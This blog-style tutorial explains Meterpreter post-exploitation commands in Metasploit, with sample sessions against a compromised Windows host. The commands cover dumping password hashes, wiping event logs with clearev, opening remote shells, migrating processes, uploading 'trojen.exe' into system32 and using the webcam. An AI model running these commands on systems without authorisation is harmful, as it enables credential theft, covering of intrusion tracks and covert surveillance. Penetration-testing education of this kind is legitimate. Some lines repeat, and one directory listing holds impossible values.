28th March 2025

What is Meterpreter? Some Important Commands Used in Meterpreter

Meterpreter is a tool written for the Metasploit Framework and aims to facilitate system penetration testing. It works as a kind of back door; It is designed to make use of special toolkits, upload files, download files, retrieve password summaries, manage processes or perform any desired operation on the Ruby interpreter after the system has been installed. Although it was originally designed to run on target systems with a Windows operating system, nowadays it also works on Linux and BSD operating systems, as well as on a PHP interpreter and a Java virtual machine. Meterpreter cannot support the same type of modules and scripts on different platforms it can run on. Although many basic features are common, it is not always possible to access advanced features due to operating system and platform differences. It is one of the most used payloads on Metasploit.

Now let’s examine Meterpreter commands and see what we can do with Meterpreter.


As the name suggests, it lists the available commands and gives short descriptions when you issue the help command in Meterpreter.

Meterpreter  help



The background command sends the active Meterpreter session to the background and brings you back to the “msf>” command client. You can use the sessions command to switch to the background Meterpreter session.

Meterpreter background



In Linux operating systems, the cat command is used to print the contents of a file to the screen. Meterpreter also works the same.

meterpreter > cat
meterpreter > cat
meterpreter > cat


cd> pwd

The folder is changed with the cd command. With the pwd command, you can see which folder we are in.

meterpreter > pwd 
meterpreter > cd ..
meterpreter > pwd 
meterpreter >
cd> pwd
cd> pwd



The clearev (Clear Evidence) command means to clear evidence. It tries to clean the log files created in the session opened on the other side.

meterpreter > clearev 
[*] Wiping 2 records from Application...
[*] Wiping 35 records from System...
[*] Wiping 424 records from Security...
meterpreter >
clearev command
clearev command


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It is used to download a file from the remote computer. The downloaded file is saved in whatever folder you are on your local system when starting Metasploit.

meterpreter download
meterpreter download
meterpreter download
meterpreter download



The edit command opens a file on the remote computer in the vim editor for editing. For the use of Vim Editor, you can check the Vim page.

meterpreter > ls
meterpreter > edit debug.log 


meterpreter Edit command
meterpreter Edit command



The execute command allows you to run a command on the opposite side. Notice, Meterpreter’s own commands are not executed. A command is executed in the command client of the other party.

meterpreter >execute -f cmd.exe -i -H
Process 6876 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.




On the opposite side, it displays the user ID of the system where Meterpreter is running.

meterpreter > getuid



The hashdump command reveals the SAM database of the remote computer. The previous Database saves to the loot table if you are using Workspace.

meterpreter > run post/windows/gather/hashdump



Indicates how long the other computer user has not been operating.

meterpreter > idletime 
User has been idle for: 1 day 23 hours 50 mins 9 secs
meterpreter >



Displays the remote computer’s network information.

meterpreter > ipconfig


lpwd> lcd

The commands you give while the meterpreter command line is open will operate on the other party computer. However, we may want to see or change the folder we are in on our own computer. In this case, we can do this with lpwd and lcd commands without sending Meterpreter to the background. lpwd: It shows which folder we are in on the local computer. (local print working directory) lcd: It allows to switch to the folder we want on the local computer. (local call directory)

meterpreter > lpwd 
meterpreter > lcd /var/www
meterpreter > lpwd 
meterpreter >
lpwd> lcd
lpwd> lcd


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It does the same with the ls command in the Linux Operating system. Lists the files and folders in the current folder.

meterpreter > ls
meterpreter > ls
meterpreter > ls



Displays all processes running on the target computer.

meterpreter > ps
meterpreter > ps
meterpreter > ps



Our Meterpreter server may be running in the svchost.exe file on the opposite side. When we want to embed it into another program, we use the migrate command.

meterpreter > migrate 5780
[*] Migrating from 2488 to 5780...

[*] Migration completed successfully.
meterpreter > 


When you connect to the remote computer, you realize that the actions you take are the same after a while. For example, give the command ls, enter the programs folder with cd c: \\ Program Files and so on. you do transactions almost all the time. Here on the local computer, you can record these processes in a file, one command per line, and run them on the other side. The resource command is used for this to happen.

The point to note here is that the first file you will give to the resource command is searched in the local folder (lpwd). The second parameter is executed in the folder you are in (pwd) on the opposite side.

meterpreter > resource 
Usage: resource path1 [path2 ...]

path1:		Our batch file in our local folder.
path2:  	Opposite folder where commands will be run.

Run the commands stored in the supplied files. (- for stdin, press CTRL+D to end input from stdin)
Resource files may also contain ERB or Ruby code between <ruby></ruby> tags.

meterpreter > resource resource.txt 
[*] Processing resource.txt for ERB directives.
resource (resource.txt)> ls
Listing: C:\

Mode                 Size                Type  Last modified                     Name
----                 ----                ----  -------------                     ----
40777/rwxrwxrwx      4096                dir   2018-09-15 03:19:00 -0400         $Recycle.Bin
40777/rwxrwxrwx      0                   dir   2020-07-20 08:11:38 -0400         Documents and Settings
40777/rwxrwxrwx      0                   dir   2018-09-15 03:19:00 -0400         PerfLogs
40555/r-xr-xr-x      4096                dir   2018-09-15 03:19:00 -0400         Program Files
40777/rwxrwxrwx      4096                dir   2018-09-15 03:19:00 -0400         Program Files (x86)
40777/rwxrwxrwx      4096                dir   2018-09-15 03:19:00 -0400         ProgramData
40777/rwxrwxrwx      0                   dir   2020-07-20 18:11:09 -0400         Recovery
40777/rwxrwxrwx      0                   dir   2020-08-07 04:33:55 -0400         SHARE
40777/rwxrwxrwx      0                   dir   2020-07-28 09:08:28 -0400         StorageReports
40777/rwxrwxrwx      4096                dir   2020-07-20 18:10:46 -0400         System Volume Information
40555/r-xr-xr-x      4096                dir   2018-09-15 02:09:26 -0400         Users
40777/rwxrwxrwx      16384               dir   2018-09-15 02:09:26 -0400         Windows
100666/rw-rw-rw-     208                 fil   2020-06-30 02:31:44 -0400         debug.txt
724601544/r-xr--r--  675248625063854063  fif   21406781413-09-27 13:18:56 -0400  pagefile.sys

resource (resource.txt)> background
[*] Backgrounding session 18...
msf5 exploit(windows/smb/psexec) >




kali@kali:~$ cat resource.txt 

cat resource.txt
cat resource.txt



It allows us to search for the opposite system.

meterpreter > search -f debug.txt
Found 1 result...
    c:\debug.txt (208 bytes)
meterpreter > search -f debug.*
Found 2 results...
    c:\debug.txt (208 bytes)
    c:\Users\omers.SYSTEMCONF\AppData\Roaming\Microsoft\Windows\Recent\debug.txt.lnk (515 bytes)
meterpreter >



The shell command allows you to enter the other system’s Command Prompt line in Meterpreter.

meterpreter > shell 
Process 7156 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.




Allows you to upload a file to the opposite system. The target system’s file notation should be considered. Attention should be paid to inverted quotes.

meterpreter > upload trojen.exe c:\\windows\\system32
[*] uploading : trojen.exe -> c:\windows\system32
[*] uploaded : trojen.exe -> c:\windows\system32\trojen.exe
meterpreter >
meterpreter upload
meterpreter upload



Lists the webcams available on the target system.

meterpreter > webcam_list 
1: Integrated Webcam
meterpreter > 



It takes a photo from the target system’s webcam and saves it in .jpeg format to the folder you are in locally.


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